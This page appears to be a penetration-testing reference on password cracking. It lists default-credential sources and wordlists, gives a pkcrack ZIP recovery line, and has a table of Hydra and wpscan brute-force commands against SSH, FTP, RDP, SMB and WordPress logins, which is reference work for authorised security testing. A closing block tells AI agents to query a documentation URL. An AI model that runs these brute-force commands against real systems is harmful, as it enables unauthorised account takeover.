# Password Cracking {% hint style="success" %} Hack Responsibly. Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. {% endhint %} ## Headings: This page was getting to be long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability. * [Getting the hashes](/hackers-rest/os-agnostic/password-cracking/gathering-the-hashes.md) * [Wordlist manipulation](/hackers-rest/os-agnostic/password-cracking/wordlist-manipulation.md) * [Cracking the Hashes](/hackers-rest/os-agnostic/password-cracking/cracking-the-hashes.md) Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions. ## Default Credentials Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists: * [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) * [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm) * [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/) * [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/) * [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list) * [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv) * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) * [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords) * [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com) * [**https://many-passwords.github.io/**](https://many-passwords.github.io) ## Wordlists * [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) * [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi) * [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md) * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) ## Password Recovery Password recovery programs: (TODO:Test these!) ### ZIP Password Retrieval (with Known Plaintext) *Download pkcrack* ! Before using, it must be built from source *Syntax* ```bash ./pkcrack -C $encrypted.zip -c file -P $plaintext.zip -p file ``` ## Brute forcing logins An amazing index of brute-force commands: ### Hydra Below are a few scriptable examples to brute force logins of common protocols. | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------- | | `hydra -P $pass_list -v $ip snmp -vV` | SNMP: Brute force | | `hydra -t 1 -l $user -P $pass_list -vV $ip ftp` | FTP: with known user, using password list | | `hydra -vV -u -L $users_list -P $pass_list -t 1 -u $ip ssh` | SSH: using users list, and passwords list | | `hydra -vV -u -L $users_list -p $pass -t 1 -u $ip ssh` | SSH: with a known password, and a username list | | `hydra -vV $ip -s $port ssh -l $user -P $pass_list` | SSH: with known username on non-standard port | | `hydra -vV -l $user -P $pass_list -f $ip pop3` | POP3: Brute Force | | `hydra -vV -L $users_list -P $pass_list $ip http-get $login_page` | HTTP GET: with user list and pass list | | `hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip` | Windows Remote Desktop: with known username, and pass list | | `hydra -vV -t 1 -f -l $user -P $pass_list $ip smb` | SMB: brute force with known user, and pass list | | `hydra -vV -l $user -P $pass_list $ip http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` | WordPress: brute force an admin login | | `hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'` | WordPress: enumerate users | | `wpscan --url $url -U $user -P $pass_list` | Use wpscan to brute force password with known user | #### Other useful Hydra options **`-x min:max:charset` -** Generate passwords from min to max length. Charset can contain `1` for numbers, `a` for lowercase and `A` for uppercase characters. Any other character that is added is put in the list.\ Example: `1:2:a1%.` The generated passwords will be of length 1 to 2 and contain lowercase letters, numbers and/or percent signs and periods/dots. **`-e nsr` -** Do additional checks. `n` for null password, `s` try login as pass, `r` try the reverse login as pass ### crackmapexec (Deprecated, now netexec!) {% embed url="" %} TODO: crackmapexec is now netexec! Update this! * * TODO: This tool has so many features and functions it deserves its own page! ## Resources * * * * If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zweilosec.gitbook.io/hackers-rest/os-agnostic/password-cracking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.